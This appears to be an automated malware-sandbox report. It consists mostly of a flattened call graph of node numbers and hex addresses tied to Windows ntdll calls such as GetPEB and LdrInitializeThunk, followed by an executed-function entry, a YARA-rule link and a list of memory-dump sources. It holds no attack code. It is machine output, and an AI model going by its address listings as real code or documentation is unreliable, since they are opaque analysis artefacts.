16161 179b150 __cftof 2 API calls 16160->16161 16384 17bb236 16160->16384 16550 17ba830 16160->16550 16162 17ff12d GetPEB 16161->16162 16162->16160 16165 179cd04 16163->16165 16164 179cd95 16164->16031 16165->16164 16166 179b150 __cftof 2 API calls 16165->16166 16167 17f4e0a 16166->16167 16168 179b150 __cftof 2 API calls 16167->16168 16169 17f4e14 16168->16169 16170 179b150 __cftof 2 API calls 16169->16170 16170->16164 16172 17ffd21 16171->16172 16174 17b7d3f 16171->16174 16173 17ffd29 GetPEB 16172->16173 16172->16174 16173->16174 16174->16044 16176 17b79f6 16175->16176 16178 17b780d 16175->16178 16176->16031 16177 17b79e3 16177->16031 16178->16177 16179 179ccc0 2 API calls 16178->16179 16189 17b7880 16178->16189 16179->16178 16180 17b7a04 16868 17b7d70 16180->16868 16181 17b788a 16181->16177 16184 17b7d50 GetPEB 16181->16184 16185 17b790f 16181->16185 16183 17b7d30 GetPEB 16183->16177 16184->16185 16186 17b7917 16185->16186 16187 17ffbc2 GetPEB 16185->16187 16188 17ffbd5 GetPEB 16186->16188 16192 17b7925 16186->16192 16187->16188 16188->16192 16189->16180 16189->16181 16190 17b79c5 16190->16177 16191 17b8d76 5 API calls 16190->16191 16198 17b79d4 16190->16198 16191->16198 16192->16190 16192->16192 16196 17b7d22 16192->16196 16199 17b7a91 16192->16199 16923 17b8d76 16192->16923 16193 17b7b49 16194 17b97ed 204 API calls 16193->16194 16194->16190 16935 17d9a00 LdrInitializeThunk 16196->16935 16198->16177 16198->16183 16199->16193 16199->16196 16207 17af3bb 16200->16207 16201 17af492 16279 17ab433 16201->16279 16202 17af3fd 16204 17af40e GetPEB 16202->16204 16205 17fbc31 16202->16205 16204->16205 16206 17af425 16204->16206 16205->16206 16208 17fbc8d GetPEB 16205->16208 16209 17fbca0 GetPEB 16206->16209 16210 17af433 16206->16210 16207->16201 16207->16202 16207->16205 16208->16206 16209->16210 16210->16066 16213 17c65cc 16211->16213 16225 17c6880 16211->16225 16215 17c6861 GetPEB 16213->16215 16216 17c6818 16213->16216 16213->16225 16357 17d9670 16213->16357 16218 1807e2b 16215->16218 16219 17c6872 16215->16219 16354 17c5720 16216->16354 16218->16219 16221 1807e34 GetPEB 16218->16221 16223 1807e47 GetPEB 16219->16223 16219->16225 16220 17d9670 LdrInitializeThunk 16226 17c6834 16220->16226 16221->16219 16222 17c5720 RtlDebugPrintTimes 16224 17c683e 16222->16224 16223->16225 16224->16215 16225->16066 16226->16222 16228 1805490 16227->16228 16232 17c117f 16227->16232 16230 17d9670 LdrInitializeThunk 16228->16230 16229 17c5720 RtlDebugPrintTimes 16231 17c1185 16229->16231 16230->16232 16231->16066 16232->16229 16236 17ce842 16233->16236 16234 17b4620 206 API calls 16234->16236 16235 17ce85f 16235->16066 16236->16234 16236->16235 16237 17b77f0 206 API calls 16236->16237 16237->16236 16239 179777a 16238->16239 16240 17f28d8 16238->16240 16239->16066 16241 17c1164 2 API calls 16240->16241 16242 17f28dd 16241->16242 16244 17aeef0 206 API calls 16243->16244 16245 17cf439 16244->16245 16248 17cf454 16245->16248 16366 17cf527 16245->16366 16247 17aeb70 3 API calls 16249 17cf497 16247->16249 16248->16247 16249->16066 16251 17b9992 16250->16251 16265 17b982a 16250->16265 16255 17aeef0 199 API calls 16251->16255 16251->16265 16252 17b9839 16253 17b984e GetPEB 16252->16253 16254 18013fe 16252->16254 16253->16254 16257 17b986e 16253->16257 16254->16257 16262 180140e GetPEB 16254->16262 16258 17b99a7 16255->16258 16256 17b98cc 16259 17b9907 16256->16259 16373 17bc111 16256->16373 16264 1801421 GetPEB 16257->16264 16278 17b987c 16257->16278 16261 17aeb70 3 API calls 16258->16261 16266 180136d GetPEB 16259->16266 16269 17b990f 16259->16269 16261->16265 16262->16257 16264->16278 16265->16252 16265->16256 16268 1801380 GetPEB 16266->16268 16267 17b7d50 GetPEB 16267->16259 16270 17b991d 16268->16270 16269->16268 16269->16270 16271 17bc111 199 API calls 16270->16271 16270->16278 16272 17b996b 16271->16272 16273 17b7d50 GetPEB 16272->16273 16274 17b9970 16273->16274 16275 17b9978 16274->16275 16276 18013b9 GetPEB 16274->16276 16277 18013cc GetPEB 16275->16277 16275->16278 16276->16277 16277->16278 16278->16058 16280 17fa7da 16279->16280 16281 17ab45c 16279->16281 16284 17aeb70 3 API calls 16280->16284 16303 17aeef0 16281->16303 16283 17ab46f 16285 17b4620 203 API calls 16283->16285 16286 17fa7ef 16284->16286 16287 17ab47b 16285->16287 16289 17fa7fd GetPEB 16286->16289 16290 17ab4b9 16286->16290 16287->16280 16288 17ab485 16287->16288 16291 17ab4da 16288->16291 16292 17ab48b 16288->16292 16289->16290 16295 17fa810 GetPEB 16290->16295 16300 17ab4c7 16290->16300 16312 17b8e10 16291->16312 16308 17aeb70 16292->16308 16295->16300 16297 17aeb70 3 API calls 16299 17ab513 16297->16299 16317 17d9a00 LdrInitializeThunk 16299->16317 16300->16210 16302 17ab499 GetPEB 16302->16286 16302->16290 16304 17aef21 16303->16304 16306 17aef0c 16303->16306 16305 17aef29 16304->16305 16318 17aef40 16304->16318 16305->16283 16306->16283 16309 17aeb81 16308->16309 16311 17aeb9e 16308->16311 16309->16311 16326 1794dc0 16309->16326 16311->16302 16313 180060b 16312->16313 16314 17b8e27 16312->16314 16314->16313 16332 17b8e60 16314->16332 16316 17ab503 16316->16297 16317->16302 16319 17af0bd 16318->16319 16320 17aef5d 16318->16320 16319->16320 16321 1799080 GetPEB 16319->16321 16322 1792d8a 205 API calls 16320->16322 16323 17af042 16320->16323 16324 17af071 16320->16324 16321->16320 16322->16320 16323->16324 16325 17af053 GetPEB 16323->16325 16324->16306 16325->16324 16327 1794dfa 16326->16327 16329 1794dd1 16326->16329 16328 1792e9f LdrInitializeThunk 16327->16328 16328->16329 16330 1794f2e GetPEB GetPEB 16329->16330 16331 1794df3 16329->16331 16330->16331 16331->16311 16333 1800646 16332->16333 16334 17b8ebd 16332->16334 16335 179ccc0 GetPEB GetPEB 16333->16335 16337 1800664 16334->16337 16349 17b8eca 16334->16349 16335->16337 16336 17b8f65 __cftof 16336->16316 16339 179ccc0 GetPEB GetPEB 16337->16339 16340 18006e7 16337->16340 16338 18007dc 16342 179ccc0 GetPEB GetPEB 16338->16342 16339->16340 16345 17b7d30 GetPEB 16340->16345 16341 17b8f80 205 API calls 16343 17b8f38 16341->16343 16344 1800c56 16342->16344 16346 1800b80 GetPEB 16343->16346 16347 17b8f4a 16343->16347 16345->16336 16346->16347 16347->16336 16347->16338 16348 17c35d0 GetPEB GetPEB 16347->16348 16348->16338 16349->16336 16349->16338 16350 17aeef0 205 API calls 16349->16350 16351 18009fe 16349->16351 16352 17b8f29 16349->16352 16350->16351 16351->16352 16353 17aeb70 GetPEB GetPEB LdrInitializeThunk 16351->16353 16352->16341 16353->16352 16359 17c4e70 16354->16359 16356 17c573f 16356->16220 16356->16226 16363 17d967a 16357->16363 16360 17c4ec0 16359->16360 16362 17c4e94 __cftof 16359->16362 16361 17c4ed6 RtlDebugPrintTimes 16360->16361 16360->16362 16361->16362 16362->16356 16364 17d968f LdrInitializeThunk 16363->16364 16365 17d9681 16363->16365 16367 17cf559 16366->16367 16369 17cf543 16366->16369 16372 17d9660 LdrInitializeThunk 16367->16372 16369->16248 16370 17cf57d 16370->16369 16371 17b7d50 GetPEB 16370->16371 16371->16369 16372->16370 16375 17bc139 16373->16375 16378 17bc125 16373->16378 16374 17b77f0 206 API calls 16376 17b9902 16374->16376 16379 17d9a00 LdrInitializeThunk 16375->16379 16376->16267 16378->16374 16379->16378 16381 17b5fdb GetPEB 16380->16381 16382 17b6dfd 16380->16382 16381->16097 16381->16150 16383 17aeb70 3 API calls 16382->16383 16383->16381 16565 17bb477 16384->16565 16386 17bb260 16387 17bb264 16386->16387 16391 17bb2b2 16386->16391 16607 17b99bf 16387->16607 16390 17ba830 6 API calls 16425 17bb284 16390->16425 16391->16425 16656 17d9660 LdrInitializeThunk 16391->16656 16393 17bb333 16393->16425 16657 17d9660 LdrInitializeThunk 16393->16657 16394 17bb329 16394->16393 16672 17d9660 LdrInitializeThunk 16394->16672 16397 17bb366 16398 18028f2 16397->16398 16658 17c138b GetPEB 16397->16658 16673 17c174b 16398->16673 16402 17bb3a6 16404 1802814 GetPEB 16402->16404 16407 17bb3b8 16402->16407 16403 17bb3a1 16405 17b7d50 GetPEB 16403->16405 16405->16402 16425->16160 16427 17cf4ae 16426->16427 16428 17cf4dc 16426->16428 16427->16428 16743 17cf4ec 16427->16743 16428->16160 16431 17c5667 16430->16431 16432 17c5651 16430->16432 16433 17c5671 16431->16433 16770 1799ce1 16431->16770 16432->16431 16746 17c53c5 16432->16746 16433->16082 16436->16096 16437->16104 16439 17ba337 16438->16439 16442 17ba3f8 16438->16442 16441 17b99bf 37 API calls 16439->16441 16439->16442 16487 17ba3c6 16439->16487 16440 17ba830 6 API calls 16533 17ba3bd 16440->16533 16443 17ba37f 16441->16443 16444 17ba620 16442->16444 16452 17ba440 16442->16452 16443->16442 16445 17ba396 16443->16445 16446 17ba62d 16444->16446 16450 1801e6c GetPEB 16444->16450 16448 17ba830 6 API calls 16445->16448 16451 17ba65b 16446->16451 16528 1801eca 16446->16528 16447 17ba4e5 16455 18020c2 GetPEB 16447->16455 16496 17ba4ed 16447->16496 16449 17ba39e 16448->16449 16449->16533 16848 17cabd8 16449->16848 16453 1801e95 16450->16453 16454 1801e78 GetPEB 16450->16454 16457 17c174b LdrInitializeThunk 16451->16457 16452->16447 16463 17ba4fb 16452->16463 16464 17c174b LdrInitializeThunk 16452->16464 16452->16487 16452->16528 16456 179b150 __cftof 2 API calls 16453->16456 16458 179b150 __cftof 2 API calls 16454->16458 16460 18020d5 GetPEB 16455->16460 16459 1801e92 16456->16459 16462 17ba66e 16457->16462 16458->16459 16465 179b150 __cftof 2 API calls 16459->16465 16460->16463 16466 17ba676 16462->16466 16467 1801ede 16462->16467 16480 17ba55f 16463->16480 16484 1802109 GetPEB 16463->16484 16488 17ba594 16463->16488 16470 17ba4d8 16464->16470 16465->16446 16471 17b7d50 GetPEB 16466->16471 16479 17bb73d 6 API calls 16467->16479 16467->16487 16468 1802240 GetPEB 16472 1802269 16468->16472 16473 180224c GetPEB 16468->16473 16469 17bb73d 6 API calls 16475 17ba5b2 16469->16475 16470->16467 16477 17ba4e0 16470->16477 16478 17ba67b 16471->16478 16476 179b150 __cftof 2 API calls 16472->16476 16474 179b150 __cftof 2 API calls 16473->16474 16481 1802266 16474->16481 16482 17ba830 6 API calls 16475->16482 16476->16481 16483 17b7d50 GetPEB 16477->16483 16485 1801f11 GetPEB 16478->16485 16486 17ba688 16478->16486 16479->16487 16480->16488 16494 17ba830 6 API calls 16480->16494 16490 179b150 __cftof 2 API calls 16481->16490 16489 17ba5c1 16482->16489 16483->16447 16491 1802131 16484->16491 16492 1802114 GetPEB 16484->16492 16493 1801f24 GetPEB 16485->16493 16486->16493 16501 17ba693 16486->16501 16487->16440 16488->16469 16495 17b7d50 GetPEB 16489->16495 16490->16487 16498 179b150 __cftof 2 API calls 16491->16498 16497 179b150 __cftof 2 API calls 16492->16497 16493->16501 16494->16488 16499 17ba5c6 16495->16499 16496->16460 16496->16463 16500 180212e 16497->16500 16498->16500 16502 18021a0 GetPEB 16499->16502 16503 17ba5d3 16499->16503 16504 179b150 __cftof 2 API calls 16500->16504 16852 1799819 16501->16852 16506 18021b3 GetPEB 16502->16506 16503->16506 16507 17ba5de 16503->16507 16504->16480 16506->16507 16509 18021c8 16506->16509 16508 17b7d50 GetPEB 16507->16508 16510 17ba5e3 16508->16510 16511 17b7d50 GetPEB 16509->16511 16512 1802201 GetPEB 16510->16512 16513 17ba5f0 16510->16513 16514 18021cd 16511->16514 16512->16513 16523 17b7d50 GetPEB 16513->16523 16513->16533 16514->16507 16516 18021d1 GetPEB 16514->16516 16515 17b7d50 GetPEB 16518 17ba787 16515->16518 16516->16507 16517 17ba6cb 16519 17ba74e 16517->16519 16522 1801f56 GetPEB 16517->16522 16529 17ba77d 16517->16529 16520 17ba78f 16518->16520 16521 1801fea GetPEB 16518->16521 16519->16529 16530 17ba830 6 API calls 16519->16530 16524 17ba79a 16520->16524 16525 1801ffd GetPEB 16520->16525 16521->16525 16526 1801f61 GetPEB 16522->16526 16527 1801f7e 16522->16527 16523->16528 16525->16524 16532 179b150 __cftof 2 API calls 16526->16532 16535 179b150 __cftof 2 API calls 16527->16535 16528->16468 16528->16487 16528->16533 16529->16515 16530->16529 16537 1801f7b 16532->16537 16533->16113 16535->16537 16542 179b150 __cftof 2 API calls 16537->16542 16542->16519 16862 179b171 16547->16862 16549 179b16e 16549->16160 16551 17baa53 16550->16551 16558 17ba850 16550->16558 16551->16160 16552 18022bb GetPEB 16553 18022c7 GetPEB 16552->16553 16552->16558 16554 179b150 __cftof 2 API calls 16553->16554 16554->16558 16555 179b150 GetPEB GetPEB __cftof 16555->16558 16556 17baa3c 16556->16551 16557 18023cb GetPEB 16556->16557 16559 18023f6 16557->16559 16560 18023d7 GetPEB 16557->16560 16558->16551 16558->16552 16558->16555 16558->16556 16562 179b150 __cftof 2 API calls 16559->16562 16561 179b150 __cftof 2 API calls 16560->16561 16563 18023f1 16561->16563 16562->16563 16564 179b150 __cftof 2 API calls 16563->16564 16564->16551 16678 17bb8e4 16565->16678 16567 17bb49a 16568 17bb4ba 16567->16568 16569 1802957 GetPEB 16567->16569 16583 17bb6b1 __cftof 16567->16583 16572 17bb4e8 16568->16572 16573 18029af RtlDebugPrintTimes 16568->16573 16605 17bb65a 16568->16605 16570 1802980 16569->16570 16571 1802963 GetPEB 16569->16571 16575 179b150 __cftof 2 API calls 16570->16575 16574 179b150 __cftof 2 API calls 16571->16574 16572->16583 16688 17d9660 LdrInitializeThunk 16572->16688 16573->16583 16577 180297d 16574->16577 16575->16577 16576 1802ad1 16582 17bb680 16576->16582 16585 1802aee GetPEB 16576->16585 16578 179b150 __cftof 2 API calls 16577->16578 16578->16568 16579 17bb66c GetPEB 16579->16576 16579->16582 16581 17bb535 16581->16583 16584 17bb543 GetPEB 16581->16584 16588 1802b06 GetPEB 16582->16588 16589 17bb690 GetPEB 16582->16589 16583->16386 16586 1802a12 16584->16586 16587 17bb554 16584->16587 16585->16582 16586->16587 16590 1802a1b GetPEB 16586->16590 16594 1802a2e GetPEB 16587->16594 16606 17bb562 16587->16606 16588->16589 16591 1802b19 16588->16591 16592 17bb6a6 16589->16592 16593 1802b4f 16589->16593 16590->16587 16595 17b7d50 GetPEB 16591->16595 16592->16583 16598 17b7d50 GetPEB 16592->16598 16593->16592 16596 1802b58 GetPEB 16593->16596 16594->16606 16597 1802b1e 16595->16597 16596->16592 16599 1802b31 16597->16599 16600 1802b22 GetPEB 16597->16600 16601 1802b70 16598->16601 16599->16589 16600->16599 16602 1802b83 16601->16602 16603 1802b74 GetPEB 16601->16603 16603->16602 16605->16576 16605->16579 16606->16605 16689 17bb73d 16606->16689 16608 17b99e5 16607->16608 16650 17b99f5 16607->16650 16609 17b9a7c 16608->16609 16611 1801466 16608->16611 16608->16650 16617 17b9ae8 16609->16617 16609->16650 16701 17ba229 16609->16701 16610 17b9b2b 16615 17ba309 46 API calls 16610->16615 16611->16610 16612 17ba229 13 API calls 16611->16612 16619 18014f2 16611->16619 16616 18014da 16612->16616 16614 17b9b27 16614->16610 16614->16617 16615->16650 16618 18014de 16616->16618 16616->16619 16623 18015f9 GetPEB 16617->16623 16617->16650 16621 17ba309 46 API calls 16618->16621 16619->16610 16624 1801532 GetPEB 16619->16624 16620 17b9a3d 16620->16390 16621->16610 16622 17ba229 13 API calls 16622->16650 16626 1801624 16623->16626 16627 1801606 GetPEB 16623->16627 16628 180155d 16624->16628 16629 180153f GetPEB 16624->16629 16625 18018a7 16625->16620 16637 18018e7 GetPEB 16625->16637 16634 179b150 __cftof 2 API calls 16626->16634 16633 179b150 __cftof 2 API calls 16627->16633 16632 179b150 __cftof 2 API calls 16628->16632 16630 179b150 __cftof 2 API calls 16629->16630 16635 180155a 16630->16635 16631 17ba309 46 API calls 16631->16650 16632->16635 16638 1801621 16633->16638 16634->16638 16639 179b150 __cftof 2 API calls 16635->16639 16636 180179e GetPEB 16640 18017ab GetPEB 16636->16640 16636->16650 16641 1801912 16637->16641 16642 18018f4 GetPEB 16637->16642 16643 179b150 __cftof 2 API calls 16638->16643 16644 180157c GetPEB 16639->16644 16645 179b150 __cftof 2 API calls 16640->16645 16648 179b150 __cftof 2 API calls 16641->16648 16647 179b150 __cftof 2 API calls 16642->16647 16649 1801643 GetPEB 16643->16649 16644->16610 16645->16650 16646 179b150 __cftof 2 API calls 16646->16650 16651 180190f 16647->16651 16648->16651 16649->16650 16650->16620 16650->16622 16650->16625 16650->16631 16650->16636 16650->16646 16652 179b150 __cftof 2 API calls 16650->16652 16653 179b150 __cftof 2 API calls 16651->16653 16654 18017e8 GetPEB 16652->16654 16655 1801931 GetPEB 16653->16655 16654->16650 16655->16620 16656->16394 16657->16397 16659 17c13b9 16658->16659 16660 17c13ea 16659->16660 16663 180555b 16659->16663 16740 17d9660 LdrInitializeThunk 16659->16740 16662 17bb73d 6 API calls 16660->16662 16666 17c14a0 16662->16666 16664 17b7d50 GetPEB 16663->16664 16665 1805560 16664->16665 16668 1805574 16665->16668 16669 1805564 GetPEB 16665->16669 16667 17bb391 16666->16667 16670 17ba830 6 API calls 16666->16670 16667->16398 16667->16402 16667->16403 16668->16660 16671 180557e GetPEB 16668->16671 16669->16668 16670->16667 16671->16660 16672->16394 16741 17d96e0 LdrInitializeThunk 16673->16741 16675 17c1773 16675->16425 16676 17c1765 16676->16675 16742 17d96e0 LdrInitializeThunk 16676->16742 16679 1802c43 16678->16679 16681 17bb8fa 16678->16681 16680 1802c56 GetPEB 16679->16680 16679->16681 16682 1802c62 GetPEB 16680->16682 16683 1802c7f 16680->16683 16681->16567 16685 179b150 __cftof 2 API calls 16682->16685 16684 179b150 __cftof 2 API calls 16683->16684 16686 1802c7c 16684->16686 16685->16686 16687 179b150 __cftof 2 API calls 16686->16687 16687->16681 16688->16581 16690 17bb77c 16689->16690 16691 1802bbf GetPEB 16690->16691 16694 17bb78e 16690->16694 16692 1802be8 16691->16692 16693 1802bcb GetPEB 16691->16693 16696 179b150 __cftof 2 API calls 16692->16696 16695 179b150 __cftof 2 API calls 16693->16695 16698 17bb8e4 4 API calls 16694->16698 16700 17bb7bf 16694->16700 16697 1802be5 16695->16697 16696->16697 16699 179b150 __cftof 2 API calls 16697->16699 16698->16700 16699->16694 16700->16605 16703 17ba249 16701->16703 16706 1801c9e 16703->16706 16739 17d9660 LdrInitializeThunk 16703->16739 16704 17ba27e 16705 1801db5 GetPEB 16704->16705 16707 17b7d50 GetPEB 16704->16707 16708 1801de4 16705->16708 16709 1801dc7 GetPEB 16705->16709 16706->16614 16710 17ba28d 16707->16710 16712 179b150 __cftof 2 API calls 16708->16712 16711 179b150 __cftof 2 API calls 16709->16711 16713 17ba29a 16710->16713 16714 1801cb8 GetPEB 16710->16714 16715 1801de1 16711->16715 16712->16715 16717 1801ccb GetPEB 16713->16717 16718 17ba2a5 16713->16718 16714->16717 16716 179b150 __cftof 2 API calls 16715->16716 16719 1801e03 16716->16719 16717->16718 16720 17b7d50 GetPEB 16718->16720 16721 17ba2ba 16720->16721 16739->16704 16740->16659 16741->16676 16742->16675 16744 17cf527 2 API calls 16743->16744 16745 17cf505 16744->16745 16745->16428 16747 17c53d1 16746->16747 16748 17c53fb GetPEB 16747->16748 16750 18070b0 16747->16750 16749 17c540e 16748->16749 16748->16750 16749->16750 16751 17aeef0 205 API calls 16749->16751 16752 17c5426 16751->16752 16752->16750 16773 17c55c8 16752->16773 16757 17aeb70 3 API calls 16758 17c54a0 16757->16758 16785 17c3c3e 16758->16785 16845 1799d54 16770->16845 16772 1799d01 16772->16433 16774 17c55da 16773->16774 16777 17c546c 16773->16777 16775 17b4620 206 API calls 16774->16775 16776 17c55ec __cftof 16775->16776 16776->16777 16778 17b77f0 206 API calls 16776->16778 16777->16750 16779 17c5539 16777->16779 16778->16777 16780 17c554d 16779->16780 16781 17c5487 16779->16781 16782 17b4620 206 API calls 16780->16782 16781->16757 16783 17c5580 16782->16783 16783->16781 16821 17beb9a 16783->16821 16786 17c4e70 RtlDebugPrintTimes 16785->16786 16787 17c3c65 16786->16787 16832 17c3fcd 16787->16832 16822 17bec9a 16821->16822 16824 17bebb9 16821->16824 16823 17bec6b 16823->16781 16824->16823 16825 1804286 GetPEB 16824->16825 16826 1804292 GetPEB 16825->16826 16827 18042af 16825->16827 16828 179b150 __cftof GetPEB GetPEB 16826->16828 16829 179b150 __cftof GetPEB GetPEB 16827->16829 16833 17c3c6e 16832->16833 16834 17c3fdf 16832->16834 16846 17b4620 206 API calls 16845->16846 16847 1799d7e 16846->16847 16847->16772 16851 17cabf1 16848->16851 16849 17cac5f 16849->16533 16851->16849 16856 17cac7b 16851->16856 16853 1799829 16852->16853 16855 179982e 16852->16855 16854 17bb8e4 4 API calls 16853->16854 16854->16855 16855->16517 16855->16855 16857 17cacda 16856->16857 16858 17cacb0 16856->16858 16857->16851 16858->16857 16861 17d96e0 LdrInitializeThunk 16858->16861 16860 17cad10 GetPEB GetPEB GetPEB 16860->16857 16861->16860 16863 179b180 __cftof 16862->16863 16864 179b1b0 GetPEB 16863->16864 16867 179b1c0 __cftof 16863->16867 16864->16867 16865 17f495f GetPEB 16866 179b1d1 __cftof 16865->16866 16866->16549 16867->16865 16867->16866 16918 17b7df2 16868->16918 16869 17b7e09 GetPEB 16869->16918 16870 17ffd8f GetPEB 16870->16918 16871 17ffda2 GetPEB 16871->16918 16872 17ffde6 16874 179ccc0 2 API calls 16872->16874 16873 17aeef0 186 API calls 16873->16918 16893 17b848a 16874->16893 16875 17b8a50 GetPEB 16875->16918 16876 180042a GetPEB 16876->16918 16878 17aeb70 3 API calls 16878->16918 16879 17b8848 16882 17ba309 58 API calls 16879->16882 16880 17b84f3 16880->16198 16881 1800396 16885 17ba830 6 API calls 16881->16885 16882->16893 16883 17b857e 16886 17ba309 58 API calls 16883->16886 16884 1800462 GetPEB 16887 180047e 16884->16887 16885->16893 16886->16893 16890 180048e GetPEB 16887->16890 16888 17c174b LdrInitializeThunk 16888->16918 16889 17b7d50 GetPEB 16889->16918 16892 18004a4 GetPEB 16890->16892 16891 17ba229 13 API calls 16891->16918 16894 18004cc 16892->16894 16895 18004b3 16892->16895 16936 17b8c4a 16893->16936 16900 18004f8 GetPEB 16894->16900 16897 17b7d50 GetPEB 16895->16897 16896 17fff14 GetPEB 16898 17fff21 GetPEB 16896->16898 16896->16918 16899 18004b8 16897->16899 16901 179b150 __cftof 2 API calls 16898->16901 16899->16894 16903 18004bc GetPEB 16899->16903 16906 180050e 16900->16906 16901->16918 16902 179b150 GetPEB GetPEB __cftof 16902->16918 16903->16894 16904 18000ae GetPEB 16908 18000bb GetPEB 16904->16908 16904->16918 16905 17ba309 58 API calls 16905->16918 16909 17b7d50 GetPEB 16906->16909 16907 18001ba GetPEB 16910 18001c7 GetPEB 16907->16910 16907->16918 16911 179b150 __cftof 2 API calls 16908->16911 16912 1800513 16909->16912 16914 179b150 __cftof 2 API calls 16910->16914 16911->16918 16915 1800517 GetPEB 16912->16915 16916 180052a 16912->16916 16913 179b150 __cftof 2 API calls 16917 17fff62 GetPEB 16913->16917 16914->16918 16915->16916 16917->16918 16918->16869 16918->16870 16918->16871 16918->16872 16918->16873 16918->16875 16918->16876 16918->16878 16918->16879 16918->16880 16918->16881 16918->16883 16918->16884 16918->16887 16918->16888 16918->16889 16918->16890 16918->16891 16918->16892 16918->16893 16918->16896 16918->16900 16918->16902 16918->16904 16918->16905 16918->16906 16918->16907 16918->16913 16919 179b150 __cftof 2 API calls 16918->16919 16920 179b150 __cftof 2 API calls 16918->16920 16921 1800208 GetPEB 16919->16921 16922 18000fc GetPEB 16920->16922 16921->16918 16922->16918 16927 17b8d8b GetPEB 16923->16927 16930 17b8dd7 16923->16930 16925 17b8daa 16929 17b8db8 GetPEB 16925->16929 16925->16930 16926 180059b 16926->16925 16928 18005a4 GetPEB 16926->16928 16927->16925 16927->16926 16928->16925 16931 17b8dc9 16929->16931 16932 18005b7 16929->16932 16930->16199 16931->16930 16934 18005d3 GetPEB 16931->16934 16932->16931 16933 18005c0 GetPEB 16932->16933 16933->16931 16934->16930 16935->16177 16937 17b8c52 16936->16937 16938 1794dc0 3 API calls 16937->16938 16939 17b8cda 16937->16939 16938->16939 16939->16880 16941 17e71ae 16940->16941 16942 17e71fb 16940->16942 16941->16942 16946 17e71b5 16941->16946 16943 17db58e __cftof 2 API calls 16942->16943 16944 17aa54f 16943->16944 16944->16008 16944->16014 16946->16944 16958 17db58e 16946->16958 16948 17cf6ec 16947->16948 16949 17b3a1c 207 API calls 16948->16949 16950 17cf71c __cftof 16948->16950 16949->16950 16950->16016 16952 17e711f 16951->16952 16953 17e712f 16951->16953 16952->16953 16956 17e7136 16952->16956 16954 17db58e __cftof 2 API calls 16953->16954 16955 17e7179 16954->16955 16956->16955 16957 17db58e __cftof 2 API calls 16956->16957 16957->16955 16959 179b150 __cftof 2 API calls 16958->16959 16960 17db627 __cftof 16959->16960 16960->16944 16962 17b77f0 206 API calls 16961->16962 16963 179ad48 16962->16963 16963->16001 19102 1791600 19105 1791618 19102->19105 19104 1791614 19106 1791624 19105->19106 19107 17916e0 19106->19107 19113 17916e8 19106->19113 19114 1791be9 19106->19114 19108 17eef30 GetPEB 19107->19108 19107->19113 19109 17b77f0 206 API calls 19108->19109 19109->19113 19111 17916aa __cftof 19111->19113 19119 1791a30 19111->19119 19113->19104 19115 1791c07 19114->19115 19116 1791c0b GetPEB 19115->19116 19118 1791c1e 19115->19118 19117 17b4620 206 API calls 19116->19117 19117->19118 19118->19111 19122 1791aa0 19119->19122 19121 1791a47 19121->19107 19123 1791ae7 19122->19123 19134 1791aba 19122->19134 19124 1791aec 19123->19124 19127 1791b5e 19123->19127 19125 1791af7 GetPEB 19124->19125 19124->19134 19128 1791bd3 19125->19128 19129 1791b16 19125->19129 19126 1791b88 19126->19134 19136 17d9660 LdrInitializeThunk 19126->19136 19127->19126 19135 17d9660 LdrInitializeThunk 19127->19135 19133 17b4620 206 API calls 19128->19133 19132 17b8e10 206 API calls 19129->19132 19132->19134 19133->19134 19134->19121 19135->19126 19136->19134 18316 1792bc2 18317 1792be2 18316->18317 18318 17ef905 18316->18318 18318->18317 18320 17d95d0 LdrInitializeThunk 18318->18320 18320->18317

                                                          Executed Functions

                                                          Function 017D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4 17d95d0-17d95dc LdrInitializeThunk
                                                          APIs
                                                          • LdrInitializeThunk.NTDLL(017EFB26,000000FF,?,?,?,01794E01,?,?,?,017AEBD0,?,?,017B6E12,?,017B5FDB,000000FF), ref: 017D95DA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
